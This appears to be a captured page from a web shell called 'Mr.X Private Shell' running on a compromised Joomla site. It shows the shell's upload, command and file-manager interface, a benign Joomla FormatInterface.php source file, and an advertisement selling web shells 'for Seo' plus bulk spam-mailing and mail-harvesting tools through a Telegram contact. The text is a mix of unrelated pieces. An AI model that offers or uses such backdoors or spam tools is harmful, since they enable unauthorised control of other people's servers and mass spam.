__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php

/**
 * Part of the Joomla Framework Registry Package
 *
 * @copyright  Copyright (C) 2015 Open Source Matters, Inc.
 * @license    GNU General Public License version 2 or later; see LICENSE
 */

namespace Joomla\Registry;

/**
 * Interface defining a format object
 *
 * @since  1.5.0
 * @since  1.5.0  Deprecated `AbstractRegistryFormat` in favor of the `FormatInterface`.
 * @since  2.0.0  Deprecated `AbstractRegistryFormat`. Format objects must now implement the `FormatInterface`.
 */
interface FormatInterface
{
    /**
     * Converts an object into a formatted string.
     *
     * @param  object  $object   Data Source Object.
     * @param  array   $options  An array of options for the formatter.
     *
     * @return  string  Formatted string.
     *
     * @since   1.5.0
     * @since   2.0.0  The `FormatInterface::objectToString()` method typehints the `$options` argument as an array;
     *                 this was not enforced before 2.0.0 with `AbstractRegistryFormat::objectToString()`.
     */
    public function objectToString($object, array $options = []);

    /**
     * Converts a formatted string into an object.
     *
     * @param  string  $data     Formatted string
     * @param  array   $options  An array of options for the formatter.
     *
     * @return  object  Data Object
     *
     * @since   1.5.0
     */
    public function stringToObject($data, array $options = []);
}

Filemanager

Name Type Size Permission Actions
Format Folder 0775
Factory.php File 1.78 KB 0664
FormatInterface.php File 1.39 KB 0664
Registry.php File 25.96 KB 0664
Filemanager